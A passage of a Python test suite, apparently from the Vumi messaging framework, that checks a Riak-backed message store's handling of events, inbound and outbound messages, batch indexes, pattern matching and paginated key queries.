self.assertEqual(stored_msg._riak_object.get_indexes(), set([
('batches_bin', batch_id_1),
('batches_bin', batch_id_2),
('batches_with_addresses_bin',
"%s$%s$%s" % (batch_id_1, timestamp, msg['to_addr'])),
('batches_with_addresses_bin',
"%s$%s$%s" % (batch_id_2, timestamp, msg['to_addr'])),
('batches_with_addresses_reverse_bin',
"%s$%s$%s" % (batch_id_1, reverse_ts, msg['to_addr'])),
('batches_with_addresses_reverse_bin',
"%s$%s$%s" % (batch_id_2, reverse_ts, msg['to_addr'])),
]))
@inlineCallbacks
def test_get_events_for_message(self):
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack)
dr = self.msg_helper.make_delivery_report(msg)
dr_id = dr['event_id']
yield self.store.add_event(dr)
stored_ack = yield self.store.get_event(ack_id)
stored_dr = yield self.store.get_event(dr_id)
events = yield self.store.get_events_for_message(msg_id)
self.assertEqual(len(events), 2)
self.assertTrue(
all(isinstance(event, TransportEvent) for event in events))
self.assertTrue(stored_ack in events)
self.assertTrue(stored_dr in events)
@inlineCallbacks
def test_add_ack_event_batch_ids_from_outbound(self):
"""
If the `batch_ids` param is not given, and the event doesn't exist,
batch ids are looked up on the outbound message.
"""
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack)
stored_ack = yield self.store.get_event(ack_id)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(stored_ack, ack)
self.assertEqual(event_keys, [ack_id])
self.assertEqual(batch_status, self._batch_status(sent=1, ack=1))
event = yield self.store.events.load(ack_id)
self.assertEqual(event.batches.keys(), [batch_id])
timestamp = format_vumi_date(ack["timestamp"])
self.assertEqual(event.message_with_status, "%s$%s$ack" % (
msg_id, timestamp))
self.assertEqual(set(event.batches_with_statuses_reverse), set([
"%s$%s$ack" % (batch_id, to_reverse_timestamp(timestamp)),
]))
@inlineCallbacks
def test_add_ack_event_uses_existing_batches(self):
"""
If the `batch_ids` param is not given, and the event already
exists, batch ids should not be looked up on the outbound message.
"""
# create a message but don't store it
msg = self.msg_helper.make_outbound('outbound text')
msg_id = msg['message_id']
batch_id = yield self.store.batch_start([('pool', 'tag')])
# create an event and store it
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack, [batch_id])
# now store the event again without specifying batches
yield self.store.add_event(ack)
stored_ack = yield self.store.get_event(ack_id)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(stored_ack, ack)
self.assertEqual(event_keys, [ack_id])
self.assertEqual(batch_status, self._batch_status(sent=0, ack=1))
event = yield self.store.events.load(ack_id)
self.assertEqual(event.batches.keys(), [batch_id])
timestamp = format_vumi_date(ack["timestamp"])
self.assertEqual(event.message_with_status, "%s$%s$ack" % (
msg_id, timestamp))
self.assertEqual(set(event.batches_with_statuses_reverse), set([
"%s$%s$ack" % (batch_id, to_reverse_timestamp(timestamp)),
]))
@inlineCallbacks
def test_add_ack_event_with_batch_ids(self):
"""
If an event is added with batch_ids provided, those batch_ids are used.
"""
msg_id, msg, batch_id = yield self._create_outbound()
batch_1 = yield self.store.batch_start([])
batch_2 = yield self.store.batch_start([])
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack, batch_ids=[batch_1, batch_2])
stored_ack = yield self.store.get_event(ack_id)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
batch_1_status = yield self.store.batch_status(batch_1)
batch_2_status = yield self.store.batch_status(batch_2)
self.assertEqual(stored_ack, ack)
self.assertEqual(event_keys, [ack_id])
self.assertEqual(batch_status, self._batch_status(sent=1))
self.assertEqual(batch_1_status, self._batch_status(ack=1))
self.assertEqual(batch_2_status, self._batch_status(ack=1))
event = yield self.store.events.load(ack_id)
timestamp = format_vumi_date(ack["timestamp"])
self.assertEqual(event.message_with_status, "%s$%s$ack" % (
msg_id, timestamp))
self.assertEqual(set(event.batches_with_statuses_reverse), set([
"%s$%s$ack" % (batch_1, to_reverse_timestamp(timestamp)),
"%s$%s$ack" % (batch_2, to_reverse_timestamp(timestamp)),
]))
@inlineCallbacks
def test_add_ack_event_without_batch_ids_no_outbound(self):
"""
If an event is added without batch_ids and no outbound message is
found, no batch_ids will be used.
"""
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
ack['user_message_id'] = "no-message"
yield self.store.add_event(ack)
stored_ack = yield self.store.get_event(ack_id)
event_keys = yield self.store.message_event_keys("no-message")
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(stored_ack, ack)
self.assertEqual(event_keys, [ack_id])
self.assertEqual(batch_status, self._batch_status(sent=1))
event = yield self.store.events.load(ack_id)
timestamp = format_vumi_date(ack["timestamp"])
self.assertEqual(event.message_with_status, "%s$%s$ack" % (
"no-message", timestamp))
self.assertEqual(set(event.batches_with_statuses_reverse), set())
@inlineCallbacks
def test_add_ack_event_with_empty_batch_ids(self):
"""
If an event is added with an empty list of batch_ids, no batch_ids will
be used.
"""
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack, batch_ids=[])
stored_ack = yield self.store.get_event(ack_id)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(stored_ack, ack)
self.assertEqual(event_keys, [ack_id])
self.assertEqual(batch_status, self._batch_status(sent=1))
event = yield self.store.events.load(ack_id)
timestamp = format_vumi_date(ack["timestamp"])
self.assertEqual(event.message_with_status, "%s$%s$ack" % (
msg_id, timestamp))
self.assertEqual(set(event.batches_with_statuses_reverse), set())
@inlineCallbacks
def test_add_ack_event_again(self):
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack)
old_stored_ack = yield self.store.get_event(ack_id)
self.assertEqual(old_stored_ack, ack)
ack['helper_metadata']['foo'] = {'bar': 'baz'}
yield self.store.add_event(ack)
new_stored_ack = yield self.store.get_event(ack_id)
self.assertEqual(new_stored_ack, ack)
self.assertNotEqual(old_stored_ack, new_stored_ack)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(event_keys, [ack_id])
self.assertEqual(batch_status, self._batch_status(sent=1, ack=1))
@inlineCallbacks
def test_add_nack_event(self):
msg_id, msg, batch_id = yield self._create_outbound()
nack = self.msg_helper.make_nack(msg)
nack_id = nack['event_id']
yield self.store.add_event(nack)
stored_nack = yield self.store.get_event(nack_id)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(stored_nack, nack)
self.assertEqual(event_keys, [nack_id])
self.assertEqual(batch_status, self._batch_status(sent=1, nack=1))
event = yield self.store.events.load(nack_id)
self.assertEqual(event.message_with_status, "%s$%s$nack" % (
msg_id, nack["timestamp"]))
@inlineCallbacks
def test_add_ack_event_without_batch(self):
msg_id, msg, _batch_id = yield self._create_outbound(tag=None)
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack)
stored_ack = yield self.store.get_event(ack_id)
event_keys = yield self.store.message_event_keys(msg_id)
self.assertEqual(stored_ack, ack)
self.assertEqual(event_keys, [ack_id])
@inlineCallbacks
def test_add_nack_event_without_batch(self):
msg_id, msg, _batch_id = yield self._create_outbound(tag=None)
nack = self.msg_helper.make_nack(msg)
nack_id = nack['event_id']
yield self.store.add_event(nack)
stored_nack = yield self.store.get_event(nack_id)
event_keys = yield self.store.message_event_keys(msg_id)
self.assertEqual(stored_nack, nack)
self.assertEqual(event_keys, [nack_id])
@inlineCallbacks
def test_add_delivery_report_events(self):
msg_id, msg, batch_id = yield self._create_outbound()
dr_ids = []
for status in TransportEvent.DELIVERY_STATUSES:
dr = self.msg_helper.make_delivery_report(
msg, delivery_status=status)
dr_id = dr['event_id']
dr_ids.append(dr_id)
yield self.store.add_event(dr)
stored_dr = yield self.store.get_event(dr_id)
self.assertEqual(stored_dr, dr)
event = yield self.store.events.load(dr_id)
self.assertEqual(event.message_with_status, "%s$%s$%s" % (
msg_id, dr["timestamp"], "delivery_report.%s" % (status,)))
event_keys = yield self.store.message_event_keys(msg_id)
self.assertEqual(sorted(event_keys), sorted(dr_ids))
dr_counts = dict((status, 1)
for status in TransportEvent.DELIVERY_STATUSES)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(batch_status, self._batch_status(sent=1, **dr_counts))
@inlineCallbacks
def test_add_inbound_message(self):
msg_id, msg, _batch_id = yield self._create_inbound(tag=None)
stored_msg = yield self.store.get_inbound_message(msg_id)
self.assertEqual(stored_msg, msg)
@inlineCallbacks
def test_add_inbound_message_again(self):
msg_id, msg, _batch_id = yield self._create_inbound(tag=None)
old_stored_msg = yield self.store.get_inbound_message(msg_id)
self.assertEqual(old_stored_msg, msg)
msg['helper_metadata']['foo'] = {'bar': 'baz'}
yield self.store.add_inbound_message(msg)
new_stored_msg = yield self.store.get_inbound_message(msg_id)
self.assertEqual(new_stored_msg, msg)
self.assertNotEqual(old_stored_msg, new_stored_msg)
@inlineCallbacks
def test_add_inbound_message_with_batch_id(self):
msg_id, msg, batch_id = yield self._create_inbound(by_batch=True)
stored_msg = yield self.store.get_inbound_message(msg_id)
inbound_keys = yield self.store.batch_inbound_keys(batch_id)
self.assertEqual(stored_msg, msg)
self.assertEqual(inbound_keys, [msg_id])
@inlineCallbacks
def test_add_inbound_message_with_tag(self):
msg_id, msg, batch_id = yield self._create_inbound()
stored_msg = yield self.store.get_inbound_message(msg_id)
inbound_keys = yield self.store.batch_inbound_keys(batch_id)
self.assertEqual(stored_msg, msg)
self.assertEqual(inbound_keys, [msg_id])
@inlineCallbacks
def test_add_inbound_message_to_multiple_batches(self):
msg_id, msg, batch_id_1 = yield self._create_inbound()
batch_id_2 = yield self.store.batch_start()
yield self.store.add_inbound_message(msg, batch_id=batch_id_2)
self.assertEqual((yield self.store.batch_inbound_keys(batch_id_1)),
[msg_id])
self.assertEqual((yield self.store.batch_inbound_keys(batch_id_2)),
[msg_id])
# Make sure we're writing the right indexes.
stored_msg = yield self.store.inbound_messages.load(msg_id)
timestamp = format_vumi_date(msg['timestamp'])
reverse_ts = to_reverse_timestamp(timestamp)
self.assertEqual(stored_msg._riak_object.get_indexes(), set([
('batches_bin', batch_id_1),
('batches_bin', batch_id_2),
('batches_with_addresses_bin',
"%s$%s$%s" % (batch_id_1, timestamp, msg['from_addr'])),
('batches_with_addresses_bin',
"%s$%s$%s" % (batch_id_2, timestamp, msg['from_addr'])),
('batches_with_addresses_reverse_bin',
"%s$%s$%s" % (batch_id_1, reverse_ts, msg['from_addr'])),
('batches_with_addresses_reverse_bin',
"%s$%s$%s" % (batch_id_2, reverse_ts, msg['from_addr'])),
]))
@inlineCallbacks
def test_inbound_counts(self):
_msg_id, _msg, batch_id = yield self._create_inbound(by_batch=True)
self.assertEqual(1, (yield self.store.batch_inbound_count(batch_id)))
yield self.store.add_inbound_message(
self.msg_helper.make_inbound("foo"), batch_id=batch_id)
self.assertEqual(2, (yield self.store.batch_inbound_count(batch_id)))
@inlineCallbacks
def test_outbound_counts(self):
_msg_id, _msg, batch_id = yield self._create_outbound(by_batch=True)
self.assertEqual(1, (yield self.store.batch_outbound_count(batch_id)))
yield self.store.add_outbound_message(
self.msg_helper.make_outbound("foo"), batch_id=batch_id)
self.assertEqual(2, (yield self.store.batch_outbound_count(batch_id)))
@inlineCallbacks
def test_inbound_keys_matching(self):
msg_id, msg, batch_id = yield self._create_inbound(content='hello')
self.assertEqual(
[msg_id],
(yield self.store.batch_inbound_keys_matching(batch_id, query=[{
'key': 'msg.content',
'pattern': 'hell.+',
'flags': 'i',
}])))
# test case sensitivity
self.assertEqual(
[],
(yield self.store.batch_inbound_keys_matching(batch_id, query=[{
'key': 'msg.content',
'pattern': 'HELLO',
'flags': '',
}])))
# the inbound from_addr has a leading +, it needs to be escaped
self.assertEqual(
[msg_id],
(yield self.store.batch_inbound_keys_matching(batch_id, query=[{
'key': 'msg.from_addr',
'pattern': "\%s" % (msg.payload['from_addr'],),
'flags': 'i',
}])))
# the outbound to_addr has a leading +, it needs to be escaped
self.assertEqual(
[msg_id],
(yield self.store.batch_inbound_keys_matching(batch_id, query=[{
'key': 'msg.to_addr',
'pattern': "\%s" % (msg.payload['to_addr'],),
'flags': 'i',
}])))
@inlineCallbacks
def test_outbound_keys_matching(self):
msg_id, msg, batch_id = yield self._create_outbound(content='hello')
self.assertEqual(
[msg_id],
(yield self.store.batch_outbound_keys_matching(batch_id, query=[{
'key': 'msg.content',
'pattern': 'hell.+',
'flags': 'i',
}])))
# test case sensitivity
self.assertEqual(
[],
(yield self.store.batch_outbound_keys_matching(batch_id, query=[{
'key': 'msg.content',
'pattern': 'HELLO',
'flags': '',
}])))
self.assertEqual(
[msg_id],
(yield self.store.batch_outbound_keys_matching(batch_id, query=[{
'key': 'msg.from_addr',
'pattern': msg.payload['from_addr'],
'flags': 'i',
}])))
# the outbound to_addr has a leading +, it needs to be escaped
self.assertEqual(
[msg_id],
(yield self.store.batch_outbound_keys_matching(batch_id, query=[{
'key': 'msg.to_addr',
'pattern': "\%s" % (msg.payload['to_addr'],),
'flags': 'i',
}])))
@inlineCallbacks
def test_add_inbound_message_with_batch_ids(self):
batch_id1 = yield self.store.batch_start([])
batch_id2 = yield self.store.batch_start([])
msg = self.msg_helper.make_inbound("hi")
yield self.store.add_inbound_message(
msg, batch_ids=[batch_id1, batch_id2])
stored_msg = yield self.store.get_inbound_message(msg['message_id'])
inbound_keys1 = yield self.store.batch_inbound_keys(batch_id1)
inbound_keys2 = yield self.store.batch_inbound_keys(batch_id2)
self.assertEqual(stored_msg, msg)
self.assertEqual(inbound_keys1, [msg['message_id']])
self.assertEqual(inbound_keys2, [msg['message_id']])
@inlineCallbacks
def test_add_inbound_message_with_batch_id_and_batch_ids(self):
batch_id1 = yield self.store.batch_start([])
batch_id2 = yield self.store.batch_start([])
msg = self.msg_helper.make_inbound("hi")
yield self.store.add_inbound_message(
msg, batch_id=batch_id1, batch_ids=[batch_id2])
stored_msg = yield self.store.get_inbound_message(msg['message_id'])
inbound_keys1 = yield self.store.batch_inbound_keys(batch_id1)
inbound_keys2 = yield self.store.batch_inbound_keys(batch_id2)
self.assertEqual(stored_msg, msg)
self.assertEqual(inbound_keys1, [msg['message_id']])
self.assertEqual(inbound_keys2, [msg['message_id']])
@inlineCallbacks
def test_add_outbound_message_with_batch_ids(self):
batch_id1 = yield self.store.batch_start([])
batch_id2 = yield self.store.batch_start([])
msg = self.msg_helper.make_outbound("hi")
yield self.store.add_outbound_message(
msg, batch_ids=[batch_id1, batch_id2])
stored_msg = yield self.store.get_outbound_message(msg['message_id'])
outbound_keys1 = yield self.store.batch_outbound_keys(batch_id1)
outbound_keys2 = yield self.store.batch_outbound_keys(batch_id2)
self.assertEqual(stored_msg, msg)
self.assertEqual(outbound_keys1, [msg['message_id']])
self.assertEqual(outbound_keys2, [msg['message_id']])
@inlineCallbacks
def test_add_outbound_message_with_batch_id_and_batch_ids(self):
batch_id1 = yield self.store.batch_start([])
batch_id2 = yield self.store.batch_start([])
msg = self.msg_helper.make_outbound("hi")
yield self.store.add_outbound_message(
msg, batch_id=batch_id1, batch_ids=[batch_id2])
stored_msg = yield self.store.get_outbound_message(msg['message_id'])
outbound_keys1 = yield self.store.batch_outbound_keys(batch_id1)
outbound_keys2 = yield self.store.batch_outbound_keys(batch_id2)
self.assertEqual(stored_msg, msg)
self.assertEqual(outbound_keys1, [msg['message_id']])
self.assertEqual(outbound_keys2, [msg['message_id']])
@inlineCallbacks
def test_batch_inbound_keys_page(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 10)
all_keys = sorted(msg['message_id'] for msg in messages)
keys_p1 = yield self.store.batch_inbound_keys_page(batch_id, 6)
# Paginated results are sorted by key.
self.assertEqual(sorted(keys_p1), all_keys[:6])
keys_p2 = yield keys_p1.next_page()
self.assertEqual(sorted(keys_p2), all_keys[6:])
@inlineCallbacks
def test_batch_outbound_keys_page(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 10)
all_keys = sorted(msg['message_id'] for msg in messages)
keys_p1 = yield self.store.batch_outbound_keys_page(batch_id, 6)
# Paginated results are sorted by key.
self.assertEqual(sorted(keys_p1), all_keys[:6])
keys_p2 = yield keys_p1.next_page()
self.assertEqual(sorted(keys_p2), all_keys[6:])
@inlineCallbacks
def test_batch_inbound_keys_with_timestamp(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 10)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
first_page = yield self.store.batch_inbound_keys_with_timestamps(
batch_id, max_results=6)
results = list(first_page)
self.assertEqual(len(results), 6)
self.assertEqual(first_page.has_next_page(), True)
next_page = yield first_page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 10)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_inbound_keys_with_timestamp_start(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_inbound_keys_with_timestamps(
batch_id, max_results=6, start=all_keys[1][1])
self.assertEqual(list(index_page), all_keys[1:])
@inlineCallbacks
def test_batch_inbound_keys_with_timestamp_without_timestamps(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_inbound_keys_with_timestamps(
batch_id, with_timestamps=False)
self.assertEqual(list(index_page), [k for k, _ in all_keys])
@inlineCallbacks
def test_batch_inbound_keys_with_timestamp_end(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_inbound_keys_with_timestamps(
batch_id, max_results=6, end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[:-1])
@inlineCallbacks
def test_batch_inbound_keys_with_timestamp_range(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_inbound_keys_with_timestamps(
batch_id, max_results=6, start=all_keys[1][1], end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[1:-1])
@inlineCallbacks
def test_batch_outbound_keys_with_timestamp(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 10)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
first_page = yield self.store.batch_outbound_keys_with_timestamps(
batch_id, max_results=6)
results = list(first_page)
self.assertEqual(len(results), 6)
self.assertEqual(first_page.has_next_page(), True)
next_page = yield first_page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 10)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_outbound_keys_with_timestamp_without_timestamps(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_outbound_keys_with_timestamps(
batch_id, with_timestamps=False)
self.assertEqual(list(index_page), [k for k, _ in all_keys])
@inlineCallbacks
def test_batch_outbound_keys_with_timestamp_start(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_outbound_keys_with_timestamps(
batch_id, max_results=6, start=all_keys[1][1])
self.assertEqual(list(index_page), all_keys[1:])
@inlineCallbacks
def test_batch_outbound_keys_with_timestamp_end(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_outbound_keys_with_timestamps(
batch_id, max_results=6, end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[:-1])
@inlineCallbacks
def test_batch_outbound_keys_with_timestamp_range(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted((msg['timestamp'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp))
for (timestamp, key) in sorted_keys]
index_page = yield self.store.batch_outbound_keys_with_timestamps(
batch_id, max_results=6, start=all_keys[1][1], end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[1:-1])
@inlineCallbacks
def test_batch_inbound_keys_with_addresses(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 10)
sorted_keys = sorted(
(msg['timestamp'], msg['from_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
first_page = yield self.store.batch_inbound_keys_with_addresses(
batch_id, max_results=6)
results = list(first_page)
self.assertEqual(len(results), 6)
self.assertEqual(first_page.has_next_page(), True)
next_page = yield first_page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 10)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_inbound_keys_with_addresses_start(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted(
(msg['timestamp'], msg['from_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
index_page = yield self.store.batch_inbound_keys_with_addresses(
batch_id, max_results=6, start=all_keys[1][1])
self.assertEqual(list(index_page), all_keys[1:])
@inlineCallbacks
def test_batch_inbound_keys_with_addresses_end(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted(
(msg['timestamp'], msg['from_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
index_page = yield self.store.batch_inbound_keys_with_addresses(
batch_id, max_results=6, end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[:-1])
@inlineCallbacks
def test_batch_inbound_keys_with_addresses_range(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted(
(msg['timestamp'], msg['from_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
index_page = yield self.store.batch_inbound_keys_with_addresses(
batch_id, max_results=6, start=all_keys[1][1], end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[1:-1])
@inlineCallbacks
def test_batch_outbound_keys_with_addresses(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 10)
sorted_keys = sorted(
(msg['timestamp'], msg['to_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
first_page = yield self.store.batch_outbound_keys_with_addresses(
batch_id, max_results=6)
results = list(first_page)
self.assertEqual(len(results), 6)
self.assertEqual(first_page.has_next_page(), True)
next_page = yield first_page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 10)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_outbound_keys_with_addresses_start(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted(
(msg['timestamp'], msg['to_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
index_page = yield self.store.batch_outbound_keys_with_addresses(
batch_id, max_results=6, start=all_keys[1][1])
self.assertEqual(list(index_page), all_keys[1:])
@inlineCallbacks
def test_batch_outbound_keys_with_addresses_end(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted(
(msg['timestamp'], msg['to_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
index_page = yield self.store.batch_outbound_keys_with_addresses(
batch_id, max_results=6, end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[:-1])
@inlineCallbacks
def test_batch_outbound_keys_with_addresses_range(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted(
(msg['timestamp'], msg['to_addr'], msg['message_id'])
for msg in messages)
all_keys = [(key, format_vumi_date(timestamp), addr)
for (timestamp, addr, key) in sorted_keys]
index_page = yield self.store.batch_outbound_keys_with_addresses(
batch_id, max_results=6, start=all_keys[1][1], end=all_keys[-2][1])
self.assertEqual(list(index_page), all_keys[1:-1])
@inlineCallbacks
def test_batch_inbound_keys_with_addresses_reverse(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 10)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['from_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_inbound_keys_with_addresses_reverse(
batch_id, max_results=6)
results = list(page)
self.assertEqual(len(results), 6)
self.assertEqual(page.has_next_page(), True)
next_page = yield page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 10)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_inbound_keys_with_addresses_reverse_start(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['from_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_inbound_keys_with_addresses_reverse(
batch_id, max_results=6, start=all_keys[-2][1])
self.assertEqual(list(page), all_keys[:-1])
@inlineCallbacks
def test_batch_inbound_keys_with_addresses_reverse_end(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['from_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_inbound_keys_with_addresses_reverse(
batch_id, max_results=6, end=all_keys[1][1])
self.assertEqual(list(page), all_keys[1:])
@inlineCallbacks
def test_batch_inbound_keys_with_addresses_reverse_range(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['from_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_inbound_keys_with_addresses_reverse(
batch_id, max_results=6, start=all_keys[-2][1], end=all_keys[1][1])
self.assertEqual(list(page), all_keys[1:-1])
@inlineCallbacks
def test_batch_outbound_keys_with_addresses_reverse(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 10)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['to_addr'], msg['message_id'])
for msg in messages], reverse=True)
all_keys = [(key, timestamp, addr)
for (timestamp, addr, key) in sorted_keys]
page = yield self.store.batch_outbound_keys_with_addresses_reverse(
batch_id, max_results=6)
results = list(page)
self.assertEqual(len(results), 6)
self.assertEqual(page.has_next_page(), True)
next_page = yield page.next_page()
results.extend(next_page)
self.assertEqual(len(results), 10)
self.assertEqual(next_page.has_next_page(), False)
self.assertEqual(results, all_keys)
@inlineCallbacks
def test_batch_outbound_keys_with_addresses_reverse_start(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 5)
sorted_keys = sorted(
[(zero_ms(msg['timestamp']), msg['to_addr'], msg['message_id'])
for msg in messages], reverse=True)
